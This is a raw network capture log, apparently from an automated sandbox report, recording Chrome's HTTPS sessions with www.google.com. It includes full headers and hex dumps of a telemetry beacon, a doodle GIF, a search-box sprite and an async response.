2024-12-12 21:40:32 UTC	1969	OUT	POST /gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&adh=&cls=0.00007500598925533399&ime=1&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=205522&ucb=205522&ts=205822&dt=&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.b982ac60-12df-490b-a613-81ce59c66048&net=dl.1100,ect.3g,rtt.800,sd.0&hp=&sys=hc.4&p=bs.true&rt=hst.82,cbt.201,prt.2778,afti.3654,aftip.2775,aft.3654,aftqf.3656,xjses.5698,xjsee.5756,xjs.5756,lcp.3661,fcp.2765,wsrt.6165,cst.1726,dnst.142,rqst.1854,rspt.965,sslt.1726,rqstt.5276,unt.3407,cstt.3550,dit.8946&zx=1734039622938&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:33 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-QQnFBMM6jfRPabskwd2VLw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:33 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49787	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	802	OUT	GET /logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	660	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 87886 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 07 Dec 2024 13:23:23 GMT Expires: Sun, 07 Dec 2025 13:23:23 GMT Cache-Control: public, max-age=31536000 Age: 461830 Last-Modified: Mon, 25 Nov 2024 19:22:10 GMT Content-Type: image/gif Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:33 UTC	730	IN	Data Raw: 47 49 46 38 39 61 f4 01 c8 00 f7 ff 00 b5 ff f8 8d b8 fe 14 4e f2 ff bb 01 1d 1a 1b fe fc b1 98 5b 99 8d 8f 8e fd 9a 47 fe f3 4e 9f f6 ad 70 70 70 98 96 5a fd ba b8 02 fd ce ff cd 0b 06 d8 a6 00 ac 44 76 93 ff 9a 5c 68 4b 98 ff ff 54 48 ee 71 d7 01 f6 fd 6c ae fe 4b 4b 4a 6d 9a 8f fe fa 6d fd f7 92 ff 48 b1 48 ad f3 9f 92 24 fd 90 8c 92 fe f6 f3 96 fc 0f dd 4a 00 d7 f0 f6 b3 f9 ff 71 6d dd 8e fc d0 dd fe 9e 1a 19 e3 33 62 5f 55 14 fe db 50 5c 14 11 5d 20 4e 5b 6c a1 1f 48 63 fd b6 d5 fe 47 8b 53 9a 6e 23 5d a1 41 f6 5c 11 1d 5c fb 71 b8 d0 d1 b1 fc 44 3a 15 d3 24 fd 8d da 08 27 e4 a0 2e 53 97 cc fe 33 ab ef 72 fd f7 50 68 f2 fd dc 6c 07 64 29 fc 8e b6 ae d2 ca b2 fb cf cc ff da 2a ff d1 0a bd 8c 14 2a a0 d8 b8 b7 24 ba 68 92 ab ae 84 71 11 4c fc d6 b2 8f Data Ascii: GIF89aN[GNpppZDv\hKTHqlKKJmmHH$Jqm3b_UP\] N[lHcGSn#]A\\qD:$'.S3rPhld)**$hqL
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: ee dd ca 54 ff 7b c2 dd c9 e8 ff c9 ee dd 1e bd 9b 03 33 99 ee bb ca e3 eb 22 37 ef 33 78 ff 99 33 cc cc e1 ee cc dd ff 22 47 ee dd 43 22 99 ff ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 08 00 ff 00 2c 00 00 00 00 f4 01 c8 00 00 08 ff 00 19 09 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 ea dd cb b7 af df bf 80 03 0b 1e 4c b8 b0 e1 c3 88 13 2b 5e cc b8 b1 e3 c7 90 23 4b Data Ascii: T{3"73x3"GC"!NETSCAPE2.0!,H\#JH3j CI(S\0cI8s@JH]PJJXj`Kh]pKxL+^#K
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 42 a0 11 fb 40 b3 4c df 62 64 06 23 57 cd 2b 7c 81 92 96 ec a6 37 07 22 8b 05 d0 41 9e 04 91 85 2f 72 f1 4a 85 94 13 9d e7 54 27 3b 07 02 87 03 50 83 1a aa f0 65 43 86 71 8b 59 de f3 a6 6a c4 00 0a 20 32 0c 3a 8c 33 23 07 dc 85 31 8f 19 88 38 24 b3 81 0a ad c2 12 29 12 29 b7 89 01 04 18 b4 a6 ed b2 a9 cd 73 39 cc 9b a9 50 c5 40 9a 70 00 5f 30 4f 16 b2 b0 05 2e 16 00 87 3b 32 e4 a4 28 8d 80 4a 57 ca 88 5c 64 c0 17 62 7d 2b 43 76 01 43 9c da 55 8d 14 d0 85 4b 50 10 84 66 84 c0 a0 44 45 68 32 ad 20 80 2c b0 22 23 4d 9d 05 25 9e ba 48 29 06 ed 15 a7 b0 e8 45 2b 79 55 ac 12 c4 16 19 f8 86 3e 16 70 00 b2 6a 20 1c 0b f8 e7 59 d3 9a ce 92 ae f4 00 19 58 40 06 9a 87 10 14 d8 f4 ae b0 9d a1 0f 96 6a 12 d4 ff ed 62 11 44 3d e8 51 2f f0 40 12 c0 02 b1 6d 83 82 18 00 Data Ascii: B@Lbd#W+\|7"A/rJT';PeCqYj 2:3#18$))s9P@p_0O.;2(JW\db}+CvCUKPfDEh2 ,"#M%H)E+yU>pj YX@jbD=Q/@m
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 09 f6 86 5a ea b6 11 c3 20 8b b3 38 8b 0a 45 48 dd 40 7a 7c a8 8b ff 01 05 04 00 05 3b 92 7f 22 17 12 6d f7 88 69 95 8c 95 b8 00 06 02 82 da a8 8d 6c 98 10 48 f7 8d a7 28 43 18 c0 74 26 c1 0c 92 20 09 2e c0 09 22 e0 0a 74 90 01 8b 58 46 ed b8 91 c8 03 09 3f d0 07 e2 60 83 1a c1 7e db e3 05 04 30 0d 05 49 42 23 d1 76 03 f8 8f 1d 78 65 fc 91 8d 29 59 90 0d a1 0b 1e a0 90 a8 ff 38 8e e5 e8 02 92 20 02 8c 80 59 9f 78 11 cd b0 91 b3 78 0b b0 00 00 21 89 12 ec 87 0d 18 87 92 05 69 84 21 71 91 be e0 7b a4 c5 04 fd 97 8e e3 71 1e 0a 72 21 5e f2 1f 0b 11 00 df 78 93 da f7 12 10 29 91 85 b0 05 45 b7 73 20 21 01 44 19 04 2e a1 55 ee d1 76 e2 f4 94 25 01 07 a9 55 6e a4 15 7c d6 97 1e e6 81 1f 5c 69 21 69 22 8a 09 b1 0b 37 f9 03 62 39 43 a9 d8 12 cc b0 78 a1 05 07 70 Data Ascii: Z 8EH@z\|;"milH(Ct& ."tXF?`~0IB#vxe)Y8 Yxx!i!q{qr!^x)Es !D.Uv%Un\|\i!i"7b9Cxp
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: bb c2 50 40 09 19 03 0e 91 70 28 8a 46 34 37 ff 8c 76 f6 a1 c3 ef 6b 98 1e 10 43 f7 fb 10 40 1c c4 34 24 8e 05 d1 0a 7d dc a6 39 90 28 71 9b 0a 2f 62 00 04 90 09 50 dc 01 c4 90 10 d6 50 c5 6f 60 0d fb d9 59 0e 58 a4 5f ec ae f1 fa 93 51 2a 10 a7 43 b4 d1 9b 4f 28 b0 54 bb 30 70 38 05 c7 02 21 c7 6a c5 77 9e c6 08 f9 8b c7 9e cc ab d7 5a c4 8c 64 02 27 3c b1 79 6a 25 50 30 06 19 93 03 e4 72 03 43 46 49 5f f3 b9 8c 66 1f ed f0 be e0 fc be 31 e4 c3 70 64 c9 69 64 b6 03 81 ad 0c 6b 02 b3 c0 bb 04 91 01 76 50 ca 01 cc bb aa 70 ae 31 2b 04 62 7c 10 70 20 90 e5 fa bb ed b9 c0 7e 3b 10 08 eb bc f8 1a bd ed 55 ad 05 b1 0b 91 77 4f c0 cc 08 33 40 5a 6a b5 0c 02 e1 98 8c e0 c1 eb 0c b1 08 92 b6 be 5a 0b 26 9c 86 d0 9c b9 d3 1c a3 d7 7c 03 24 4d 49 37 a0 c7 60 3b 42 Data Ascii: P@p(F47vkC@4$}9(q/bPPo`YX_Q*CO(T0p8!jwZd'<yj%P0rCFI_f1pdidkvPp1+b\|p ~;UwO3@ZjZ&\|$MI7`;B
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 94 29 55 9e ac 55 01 c4 ac 54 15 65 ce a4 59 d3 e6 4d 9c 39 75 ee e4 d9 d3 e7 ce 54 41 83 b6 22 3a 6b d6 12 31 63 40 e4 a8 d5 14 5c 8a 28 4d 6b bd 4a e1 88 48 03 a3 b3 88 12 55 26 0d 83 07 0f f5 30 ae a2 b0 eb e7 ce 00 63 17 9a 8d 08 62 e5 ab 5a 8d 68 1e 20 90 ab 66 83 a9 2b 4d 40 54 c5 62 e0 5f 81 d6 78 ca a2 6b 97 91 35 c0 7f 85 40 44 a8 96 ec c3 b3 ba 1c 6b 94 c8 f1 a3 c7 90 23 4b be e5 cc 32 47 9b 46 ad ce 8e 26 5d da f4 69 d4 a9 29 0a 4d b5 35 eb 18 31 8d 96 36 bd 96 62 92 ff d4 57 e0 7a 98 21 92 75 2b d1 54 ed 2e 95 23 5e 0e 63 00 d5 15 77 25 54 8b 61 22 08 dc 29 41 cc a4 43 00 97 cd 46 79 55 4e 67 a4 4a 48 e2 81 6f 78 d2 bd 0e f1 0d 78 81 e2 21 62 70 bc 4a d7 e8 5b 93 37 5e c6 2c 12 a2 89 ce 9c 73 b8 84 c9 d3 17 2e 5f 64 49 6e 40 02 0b 34 b0 34 d6 Data Ascii: )UUTeYM9uTA":k1c@\(MkJHU&0cbZh f+M@Tb_xk5@Dk#K2GF&]i)M516bWz!u+T.#^cw%Ta")ACFyUNgJHoxx!bpJ[7^,s._dIn@44
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 0d 3c b1 2c 1a 8e 55 11 00 95 40 00 a0 37 91 d8 cd ae 49 40 cc c1 29 6a d1 06 a9 05 2a 28 b3 68 44 1b 1e 97 3a 86 4e 91 16 0f a0 45 63 1d eb 58 c6 3a e3 ff 0d ec f0 82 17 3a aa 8a 58 58 e3 0d b5 44 8f 33 84 c1 88 65 1c c1 08 f1 a8 86 2d e0 60 52 02 c0 a0 3d 2a a5 c3 2e 06 7a 90 5d e8 22 00 a2 53 5a 65 62 3a 40 88 70 6b 5f fc d9 18 44 02 86 0d 40 98 e1 0b d0 04 aa 50 f1 21 83 2b 20 b7 02 0d c8 80 61 22 a8 54 a6 46 97 8e 4e d5 1d 51 a6 21 86 25 00 af 36 29 e8 41 0b 6c a0 84 09 ec 80 18 42 f1 ea 21 69 ab 96 6e a4 b6 1e 14 60 6f 3d e4 a4 52 1a 2e a4 14 14 90 00 01 5e 00 50 bb ca e4 00 51 8c 48 2e c4 10 89 ef 41 8d 5f 6d 30 41 81 4d 60 d8 c3 7a eb 94 32 b1 46 31 1e fb e0 c7 6e 83 1e 6e 10 02 0b 58 e0 8c 90 4a 6a 00 78 50 87 30 14 b0 89 21 24 02 0e 89 c8 80 49 Data Ascii: <,U@7I@)j(hD:NEcX::XXD3e-`R=.z]"SZeb:@pk_D@P!+ a"TFNQ!%6)AlB!in`o=R.^PQH.A_m0AM`z2F1nnXJjxP0!$I
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: c0 06 28 f2 25 9d 50 1c 5f 40 85 d8 f2 81 4b a0 81 4b c0 00 a6 c4 00 18 80 81 00 f0 81 62 7c 36 88 38 c6 fe 63 86 13 28 84 2e 28 81 2e 50 46 68 04 07 15 20 40 02 dc 82 18 fc 9d 02 6b 03 b4 24 b0 1c 6b 80 56 18 39 9e 39 87 9f d9 49 b9 94 4b 6a 90 9e 9e 89 38 55 50 06 cd 12 82 0a b3 b0 0b 13 82 37 b0 06 77 94 08 61 a8 06 a6 03 00 23 80 05 36 f0 c0 0f 0c 83 05 30 a8 89 18 06 5d 60 ab 4b 78 2b a7 7c 01 1f d0 85 cf 31 a1 f3 72 0f 9f 10 47 b7 ab 08 8d cb ae b3 8c 84 16 e0 0d 22 b0 03 28 88 09 c5 c9 45 9a 88 07 02 28 84 4b f0 03 3f 38 84 10 44 c5 55 04 02 54 08 07 51 d0 3b d2 aa 49 e0 54 18 ff 10 68 84 fd 5a 00 a1 94 09 55 90 85 3c 89 06 b9 c3 85 90 a4 09 83 9b 08 7d 40 15 5b b0 85 6f 28 8c 99 b0 ca fe 23 82 3d 30 80 13 10 01 f0 5c 83 35 d8 03 15 e8 01 b1 b4 03 Data Ascii: (%P_@KKb\|68c(.(.PFh @k$kV99IKj8UP7wa#60]`Kx+\|1rG"(E(K?8DUTQ;IThZU<}@[o(#=0\5
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: d3 88 05 6d d0 82 16 c8 15 93 4d 0d 18 66 64 66 28 83 3d c8 04 59 fd de 2e 10 cf 1c 26 87 75 d0 e4 4d a6 09 38 c0 06 1a 99 b2 1e 10 0d 24 7e 5c 5e b0 06 06 18 04 7f ce 80 27 76 82 0f b8 03 4c 58 65 57 86 65 9f 10 86 99 54 8e ce ec 59 01 96 89 13 84 17 d0 29 bc ff a3 45 3f c3 1b 84 80 a1 3b 03 31 07 23 f8 04 2f 98 01 3a 06 5e 05 a8 03 96 ac 02 54 40 83 4a 8d e6 f0 4b a5 28 20 db 9b 72 45 9d fd 09 a1 63 00 2f c8 00 b2 e5 38 37 33 8d 71 66 86 12 f8 82 42 28 83 ef 0d ea ef 9d 83 2d 30 80 2d d0 4e 1f d6 2f 31 48 c0 8c 4c 81 46 c8 e7 58 e0 05 5e e0 00 37 58 81 61 ad ac 81 de 86 6d 28 06 16 e0 00 4c f0 82 c6 85 5c fd 24 10 ac 73 8c b2 82 68 1f 68 68 85 b8 65 fe 09 02 5e 46 3f 2c 53 02 1e 70 07 7d 80 66 d2 10 06 5e e0 c0 47 45 02 0a 2e c2 3a 28 80 90 6e 49 5b 48 Data Ascii: mMfdf(=Y.&uM8$~\^'vLXeWeTY)E?;1#/:^T@JK( rEc/873qfB(-0-N/1HLFX^7Xam(L\$shhhe^F?,Sp}f^GE.:(nI[H
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 40 61 a8 53 ab ce 09 6b fa f4 d8 d4 65 23 3a e4 95 99 ed 07 b7 70 13 f4 eb 97 80 45 dd 84 c5 0a 30 74 68 56 e2 e4 e0 c2 87 13 2f 6e fc 38 f2 8a b1 0e 64 38 97 f9 a8 d2 4f 07 16 c8 0a 2d 95 6a 69 a9 a7 c3 32 9b 73 35 35 54 9d 66 5b bb 66 b1 8d a0 c1 b7 49 93 e2 b6 bb 9b 01 14 df 66 55 ca 42 95 fc 3e fe fc fa f7 f3 6f 09 f1 9c 17 07 68 c3 ce 66 6e 84 f2 99 2d 8e b9 d2 1d 33 a9 a1 b6 60 55 0d 92 b5 d3 78 e4 bd f1 cb 40 70 b1 b0 5e 52 06 25 c4 02 3b 0c 9c 83 d6 6f 28 e5 d2 04 2c bb f4 b7 22 8b 2d ba f8 e2 4f be 2c e0 c5 67 5e d0 88 4b 64 e0 41 c5 60 6a cc 90 a6 1a 85 ac 91 57 40 31 e7 15 54 0c 87 ec d9 b5 01 3b 5e 68 43 e2 7c 19 d9 92 41 06 28 aa 58 11 2a f6 c1 b8 25 97 5d 7a 79 9f 2d b9 e4 e2 ff 4b 82 c1 39 48 95 84 51 4d 35 47 76 ae f8 54 61 5a ae bd 21 d0 Data Ascii: @aSke#:pE0thV/n8d8O-ji2s55Tf[fIfUB>ohfn-3`Ux@p^R%;o(,"-O,g^KdA`jW@1T;^hC\|A(X*%]zy-K9HQM5GvTaZ!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49788	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	789	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Thu, 12 Dec 2024 21:40:33 GMT Expires: Thu, 12 Dec 2024 21:40:33 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:33 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49789	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	2134	OUT	GET /async/hpba?yv=3&cs=0&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/dg%3D0/br%3D1/rs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:/xjs/_/ss/k%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/br%3D1/rs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/ck%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAA [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	1012	IN	HTTP/1.1 200 OK Version: 704846385 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:33 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:33 UTC	48	IN	Data Raw: 32 61 0d 0a 29 5d 7d 27 0a 32 32 3b 5b 22 55 56 68 62 5a 36 4b 66 46 4f 53 49 78 63 38 50 33 36 72 47 73 41 49 22 2c 22 32 31 33 31 22 5d 0d 0a Data Ascii: 2a)]}'22;["UVhbZ6KfFOSIxc8P36rGsAI","2131"]
2024-12-12 21:40:33 UTC	66	IN	Data Raw: 33 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 3cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
2024-12-12 21:40:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49784	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
